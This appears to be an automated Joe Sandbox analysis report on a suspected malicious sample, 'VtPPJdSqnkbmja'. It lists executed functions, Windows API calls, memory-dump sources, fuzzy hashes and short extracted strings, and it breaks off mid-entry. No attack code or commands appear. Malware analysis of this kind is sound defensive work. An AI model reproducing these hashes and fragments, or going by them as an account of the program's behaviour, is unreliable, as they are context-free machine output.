135ccb5 21024->21025 21040 135d228 21024->21040 21044 135d218 21024->21044 21025->21015 21029 135afb0 21028->21029 21035 135b0a8 21029->21035 21030 135afbf 21030->21020 21034 135b0a8 GetModuleHandleW 21032->21034 21033 135afbf 21033->21020 21034->21033 21036 135b0dc 21035->21036 21037 135b0b9 21035->21037 21036->21030 21037->21036 21038 135b2e0 GetModuleHandleW 21037->21038 21039 135b30d 21038->21039 21039->21030 21042 135d235 21040->21042 21041 135d26f 21041->21025 21042->21041 21048 135cff0 21042->21048 21046 135d235 21044->21046 21045 135d26f 21045->21025 21046->21045 21047 135cff0 GetModuleHandleW 21046->21047 21047->21045 21049 135cff5 21048->21049 21051 135db80 21049->21051 21052 135d11c 21049->21052 21051->21051 21053 135d127 21052->21053 21054 1355d58 GetModuleHandleW 21053->21054 21055 135dbef 21054->21055 21055->21051 21056 135d588 DuplicateHandle 21057 135d61e 21056->21057

                                                Executed Functions

                                                Function 0135D331 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0135D3BE
                                                • GetCurrentThread.KERNEL32 ref: 0135D3FB
                                                • GetCurrentProcess.KERNEL32 ref: 0135D438
                                                • GetCurrentThreadId.KERNEL32 ref: 0135D491
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 6dad9dcf478f0966c4f784f15f3617db9dba9aefcafacff29f1273483e0a09c6
                                                • Instruction ID: dfb7e6ede917967f36608134db4c5b4a2d6f6deca9c73999ad08a1c5f97f1a19
                                                • Opcode Fuzzy Hash: 6dad9dcf478f0966c4f784f15f3617db9dba9aefcafacff29f1273483e0a09c6
                                                • Instruction Fuzzy Hash: E05165B49013498FDB64DFAAD888BDEBFF1EF88304F208459E419A7251DB786845CF25
                                                Function 0135D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0135D3BE
                                                • GetCurrentThread.KERNEL32 ref: 0135D3FB
                                                • GetCurrentProcess.KERNEL32 ref: 0135D438
                                                • GetCurrentThreadId.KERNEL32 ref: 0135D491
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 150ee2e7776dcc7512999a3abf3d02df7f70f1df9d3b94638a61fb07b83ce2d6
                                                • Instruction ID: e9abc314ef1eff9587b3ca5edd98a8c8aae7b89b3a1b50285e218653b4a1641b
                                                • Opcode Fuzzy Hash: 150ee2e7776dcc7512999a3abf3d02df7f70f1df9d3b94638a61fb07b83ce2d6
                                                • Instruction Fuzzy Hash: 9E5155B49013098FDB24DFAAD848BDEBFF5EF88304F208419E419A7350DB746845CB65
                                                Function 0135B0A8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 135b0a8-135b0b7 45 135b0e3-135b0e7 44->45 46 135b0b9-135b0c6 call 1359b14 44->46 48 135b0e9-135b0f3 45->48 49 135b0fb-135b13c 45->49 52 135b0dc 46->52 53 135b0c8 46->53 48->49 55 135b13e-135b146 49->55 56 135b149-135b157 49->56 52->45 99 135b0ce call 135b331 53->99 100 135b0ce call 135b340 53->100 55->56 57 135b159-135b15e 56->57 58 135b17b-135b17d 56->58 60 135b160-135b167 call 135ad10 57->60 61 135b169 57->61 63 135b180-135b187 58->63 59 135b0d4-135b0d6 59->52 62 135b218-135b2d8 59->62 65 135b16b-135b179 60->65 61->65 94 135b2e0-135b30b GetModuleHandleW 62->94 95 135b2da-135b2dd 62->95 66 135b194-135b19b 63->66 67 135b189-135b191 63->67 65->63 70 135b19d-135b1a5 66->70 71 135b1a8-135b1b1 call 135ad20 66->71 67->66 70->71 75 135b1b3-135b1bb 71->75 76 135b1be-135b1c3 71->76 75->76 77 135b1c5-135b1cc 76->77 78 135b1e1-135b1ee 76->78 77->78 80 135b1ce-135b1de call 135ad30 call 135ad40 77->80 85 135b211-135b217 78->85 86 135b1f0-135b20e 78->86 80->78 86->85 96 135b314-135b328 94->96 97 135b30d-135b313 94->97 95->94 97->96 99->59 100->59
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B2FE
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: de014637e6ad6df6404c19aac1427c31aa972fb29b146de4bc9a0fb764247eaa
                                                • Instruction ID: 52984536d73519b592e005c00f071b92f804ca6d3f092a60e4bd0039191c956b
                                                • Opcode Fuzzy Hash: de014637e6ad6df6404c19aac1427c31aa972fb29b146de4bc9a0fb764247eaa
                                                • Instruction Fuzzy Hash: DD714670A00B058FE7A4DF2AD450B9ABBF2FF88604F008A2DD886D7A54D775E945CB91
                                                Function 0135590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 101 135590c-13559d9 CreateActCtxA 103 13559e2-1355a3c 101->103 104 13559db-13559e1 101->104 111 1355a3e-1355a41 103->111 112 1355a4b-1355a4f 103->112 104->103 111->112 113 1355a51-1355a5d 112->113 114 1355a60 112->114 113->114 116 1355a61 114->116 116->116
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 7d8b5a27741d79b7bbf7bb17c4281e47186726845fc2febd6ade235bae875e9f
                                                • Instruction ID: 024f831a88e12df93a9e083006c8199474c897b3c7112bfdcc96c81ffd455233
                                                • Opcode Fuzzy Hash: 7d8b5a27741d79b7bbf7bb17c4281e47186726845fc2febd6ade235bae875e9f
                                                • Instruction Fuzzy Hash: FA41B471C00719CBEB24CF99C884BCEBBF5BF49714F20856AD809AB251D7796946CF90
                                                Function 013544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 117 13544b4-13559d9 CreateActCtxA 120 13559e2-1355a3c 117->120 121 13559db-13559e1 117->121 128 1355a3e-1355a41 120->128 129 1355a4b-1355a4f 120->129 121->120 128->129 130 1355a51-1355a5d 129->130 131 1355a60 129->131 130->131 133 1355a61 131->133 133->133
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f9dedb27ef5adf069984dd40bfb09a05029334a5294992b9807f08705ae55bde
                                                • Instruction ID: 8bd105adceaeeb9076f2ba962ca1535862424d2a3367fad6b571223a8f819f22
                                                • Opcode Fuzzy Hash: f9dedb27ef5adf069984dd40bfb09a05029334a5294992b9807f08705ae55bde
                                                • Instruction Fuzzy Hash: AB41C471C0071DCBEB24DFA9C884B9EBBF5BF49704F20846AD809AB251DB756946CF90
                                                Function 0135D581 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 134 135d581-135d61c DuplicateHandle 135 135d625-135d642 134->135 136 135d61e-135d624 134->136 136->135
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0135D60F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: bb1385f453eef380730ab22fc1d7e507a7397f59eecb71108dcd3aec9f44d83f
                                                • Instruction ID: 007a346bfeefaae86f60986813404103b96be314c37ddd62e25ef278f3ed53c1
                                                • Opcode Fuzzy Hash: bb1385f453eef380730ab22fc1d7e507a7397f59eecb71108dcd3aec9f44d83f
                                                • Instruction Fuzzy Hash: 992103B5D002489FDB10CFAAD884AEEBFF5EB48320F14841AE958A3310D379A945CF60
                                                Function 0135D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 135d588-135d61c DuplicateHandle 140 135d625-135d642 139->140 141 135d61e-135d624 139->141 141->140
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0135D60F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: dc307ad3a46f678fd5568e1bfbff0c83e36e10a0c8315901cf797c3692b331da
                                                • Instruction ID: 54a55f5c5c41e280dd1f5db33872aa7b4d72db363e217b1815bfc2a544e88585
                                                • Opcode Fuzzy Hash: dc307ad3a46f678fd5568e1bfbff0c83e36e10a0c8315901cf797c3692b331da
                                                • Instruction Fuzzy Hash: D721E4B59002489FDB10CF9AD884ADEBBF5FB48324F14841AE918A3310D378A945CF64
                                                Function 073A2B28 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 144 73a2b28-73a2b9a PostMessageW 146 73a2b9c-73a2ba2 144->146 147 73a2ba3-73a2bb7 144->147 146->147
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 073A2B8D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1545826170.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_73a0000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d0e9a37f58f8cfffb01b7e04bcc031a1133729e9498dd7e04f908721495e6a25
                                                • Instruction ID: 26823224cbbfc2f80ca407b5dc599153125adfcc71e5ad1f51792d0f8a26fae6
                                                • Opcode Fuzzy Hash: d0e9a37f58f8cfffb01b7e04bcc031a1133729e9498dd7e04f908721495e6a25
                                                • Instruction Fuzzy Hash: EF11F8B58003499FDB10DF99D485BDEBFF4FB48324F148419E958A7640C379A544CFA5
                                                Function 0135B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 149 135b298-135b2d8 150 135b2e0-135b30b GetModuleHandleW 149->150 151 135b2da-135b2dd 149->151 152 135b314-135b328 150->152 153 135b30d-135b313 150->153 151->150 153->152
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B2FE
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1542251969.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1350000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: c6827930960a9d05bb46a70da0e4428ef380e18b1f21858f50210bb8d816a2eb
                                                • Instruction ID: 13a596f9e71d9969916501804a8cf223bdfd3eec73da06c11a16f4c8d0daa926
                                                • Opcode Fuzzy Hash: c6827930960a9d05bb46a70da0e4428ef380e18b1f21858f50210bb8d816a2eb
                                                • Instruction Fuzzy Hash: 1F11DFB5C002498FDB20CF9AC844BDEFBF5EB88614F10841AD929A7610D379A545CFA5
                                                Function 073A2B30 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 155 73a2b30-73a2b9a PostMessageW 156 73a2b9c-73a2ba2 155->156 157 73a2ba3-73a2bb7 155->157 156->157
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 073A2B8D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1545826170.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_73a0000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 245c2bc88a4b6c89193a907e1c7269335e754ef42d8fcb18f71356d31779c18e
                                                • Instruction ID: 6e2d5a951a8b05599ac9c4352f57e94c5c82440d4111e1fd38fac41116e3b157
                                                • Opcode Fuzzy Hash: 245c2bc88a4b6c89193a907e1c7269335e754ef42d8fcb18f71356d31779c18e
                                                • Instruction Fuzzy Hash: 8511D3B58003499FDB10DF9AD885BDEBBF8FB48320F10841AD918A7240D379A944CFA1
                                                Function 010ED4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541535310.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10ed000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 827aebf8385a296568078cae7c0d8794ab2d619dd2d5540ed187b487b477c1b0
                                                • Instruction ID: 9868a36aa2cb7d81f8ab72693ffee8166a7121b5ab97b2bee32b8af84bc3a362
                                                • Opcode Fuzzy Hash: 827aebf8385a296568078cae7c0d8794ab2d619dd2d5540ed187b487b477c1b0
                                                • Instruction Fuzzy Hash: 6B2103B2500240DFDB16DF55D9C4F2ABFE5FB88318F20C5A9E8890B256C336D456CBA2
                                                Function 010FD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541582484.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10fd000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1356eee2dd5fde60eed9566d76ebfdad52d972192f1cefaecbde6865fa43eb9
                                                • Instruction ID: 71d17a85bcba366bea40e7824cc93467fbb6b13beebcd0144c209b10dc0b0aca
                                                • Opcode Fuzzy Hash: c1356eee2dd5fde60eed9566d76ebfdad52d972192f1cefaecbde6865fa43eb9
                                                • Instruction Fuzzy Hash: 49212271604300DFDB15DF94D8C1B1ABBA1EB88354F20C5ADEA8A4B642C33AD847CB62
                                                Function 010ED4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541535310.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10ed000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 6b75932ffd81fe9e00c4b4f7ad8162779ffab4d8a760d00e1e196a1eee5d6f58
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 4411B176504280CFCB16CF54D9C4B16BFB1FB88314F24C6AAD8490B657C336D456CBA1
                                                Function 010FD017 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541582484.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10fd000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: 10610e8e15832397487b54b2b33870f9c7cb87138feab378410bcb77b48a44c8
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: BF11A975504280CFCB16CF54D5C4B15BBA2FB88214F24C6AEE9894BA56C33AD40ACBA2
                                                Function 010ED731 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541535310.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10ed000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da77180feb49f864bd82ed0a2ab55d162207d155c5ed90cdb267fe08f3db2b23
                                                • Instruction ID: 2db3671925c170835b034faf518d3c9e466167ede4156d4d6106b85e3e0eb1da
                                                • Opcode Fuzzy Hash: da77180feb49f864bd82ed0a2ab55d162207d155c5ed90cdb267fe08f3db2b23
                                                • Instruction Fuzzy Hash: B501AC314443849FF7115B56CDC8B6ABBE8FF81264F14C55ADDC54A182E2789840CB75
                                                Function 010ED730 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541535310.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_10ed000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74b25810b4be4785096ceaf9eff6003de923f59c4875818774d771380811a680
                                                • Instruction ID: 607b5a2d40acd9838eccdcfb811dc2e51de464cd152a2baee154a846f68d471a
                                                • Opcode Fuzzy Hash: 74b25810b4be4785096ceaf9eff6003de923f59c4875818774d771380811a680
                                                • Instruction Fuzzy Hash: 44F062754443849EE7208B1ACDC8B66FFE8EB81634F18C55AED884E282D2799844CB71

                                                Executed Functions

                                                Function 0275B328 Relevance: 4.1, Strings: 3, Instructions: 351COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: 5ce9c7f91e6f466223a81a68b2ad5987886acf2dcbbb0a445d5d1ff08db3cbbf
                                                • Instruction ID: c62e3661c163de5da6baecead4b3c5a624e99c7e26ddf4f39d2a3d53272327e9
                                                • Opcode Fuzzy Hash: 5ce9c7f91e6f466223a81a68b2ad5987886acf2dcbbb0a445d5d1ff08db3cbbf
                                                • Instruction Fuzzy Hash: EBE1F875A00628CFDB14CFA9C884AADFBF1FF49314F1590A9E819AB365DB70A941CF50
                                                Function 0275C751 Relevance: 3.9, Strings: 3, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: d879d8f82dfd15400bbfedf46d3b2ce74ce91636bfc0a066086b6797ef09d883
                                                • Instruction ID: aef690e4c3ab6757886d2ef80f9723bcf57b94b3aadf2120a908aa0e2bf005a2
                                                • Opcode Fuzzy Hash: d879d8f82dfd15400bbfedf46d3b2ce74ce91636bfc0a066086b6797ef09d883
                                                • Instruction Fuzzy Hash: F181A374E006188FEB15DFA9D984B9DFBF2BF89300F14806AE849AB365DB749941CF50
                                                Function 0275BEB0 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: ff0da668ea132dee808eb2503e9875888a5e50d8dfdad07d4db1df011352dc23
                                                • Instruction ID: 0c4bbe9688ca23c52a723a0451001ddf683787cb1094c707ece36220f792d04b
                                                • Opcode Fuzzy Hash: ff0da668ea132dee808eb2503e9875888a5e50d8dfdad07d4db1df011352dc23
                                                • Instruction Fuzzy Hash: 8481A374E006188FEB15DFA9D984B9DFBF2BF89304F14906AE809AB365DB745981CF10
                                                Function 0275C190 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: a5ba1c6ea305f4ac40133046130418635b0760bdbd033531cc9aeb682f63c914
                                                • Instruction ID: bddf588bbd9efe4b23f1f7f1ef65486a10710d142a15c8d2ee150fbfab8db101
                                                • Opcode Fuzzy Hash: a5ba1c6ea305f4ac40133046130418635b0760bdbd033531cc9aeb682f63c914
                                                • Instruction Fuzzy Hash: 3D81B574E002188FEB15DFA9D984B9DFBF2BF89300F14806AE809AB365DB749941CF55
                                                Function 0275C470 Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: 2269fb67adfaec28dd98a9c34241f68a22bbd72cc224321f9c4cfa3a07fae188
                                                • Instruction ID: 5cfab7f2688442a03c658b5985502cb6c88ab9bcece20662ef12d226db537dac
                                                • Opcode Fuzzy Hash: 2269fb67adfaec28dd98a9c34241f68a22bbd72cc224321f9c4cfa3a07fae188
                                                • Instruction Fuzzy Hash: D281A2B4E006188FEB15DFA9D984B9DFBF2BF89300F14906AE819AB365DB745941CF10
                                                Function 0275BBD2 Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: 26b0c317c3a82cf6d1c5269ea0b476e4a8a86b4f8f0e3cc09acfcac3a2a437b2
                                                • Instruction ID: 9dd0ccb637aa78d7431dc55e63e81e2150f194ccaea1bed5ac21873d3d2a6331
                                                • Opcode Fuzzy Hash: 26b0c317c3a82cf6d1c5269ea0b476e4a8a86b4f8f0e3cc09acfcac3a2a437b2
                                                • Instruction Fuzzy Hash: D281A374E00618CFEB14DFAAD984AADFBF2BF89304F149069E809AB365DB745941CF10
                                                Function 0275CA31 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: 73b37c85e396b05fec3daabea678c62558fc0267c5449aa671c7a97b35069257
                                                • Instruction ID: a90945e9a7b1eb3d7d7a704387ad1db4b96f4042449b84a59d3fbb1d44313475
                                                • Opcode Fuzzy Hash: 73b37c85e396b05fec3daabea678c62558fc0267c5449aa671c7a97b35069257
                                                • Instruction Fuzzy Hash: 4281A374E016188FEB15DFAAD984B9DFBF2BF88300F14806AE809AB365DB745941CF10
                                                Function 02754AD9 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Ljp$Ljp
                                                • API String ID: 0-3144097339
                                                • Opcode ID: 44ec1ced2cca7a05eb00fe671758ff8eebf422d116eb93aee375df36dcb64983
                                                • Instruction ID: f9fa859c2eb52da302acf4b83906bd7ed1303f67046805d059f37e37db22d706
                                                • Opcode Fuzzy Hash: 44ec1ced2cca7a05eb00fe671758ff8eebf422d116eb93aee375df36dcb64983
                                                • Instruction Fuzzy Hash: 4481B474E01618CFEB14DFA9D994A9DFBF2BF88300F148069E819AB365DB745981CF10
                                                Function 02756730 Relevance: 3.0, Strings: 2, Instructions: 466COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,q$,q
                                                • API String ID: 0-1667412543
                                                • Opcode ID: 4d941954134678ed7d590ed48f174f79492413972dfe9427a37fab3ed2514d85
                                                • Instruction ID: 5213342a4f9b72762fc8e22f62f2f2a1300201ba6e5c2ba7bfb2bcde65d5e534
                                                • Opcode Fuzzy Hash: 4d941954134678ed7d590ed48f174f79492413972dfe9427a37fab3ed2514d85
                                                • Instruction Fuzzy Hash: 40024D70A00129CFDB15CF68C984AADFBBAFF89304F958069E805AB365DB74ED41CB50
                                                Function 02756108 Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hq
                                                • API String ID: 0-1594803414
                                                • Opcode ID: 56cb7e42c4e3eda9afe2ae8f4302915eca05000044529733dbb4c22a47a47ef0
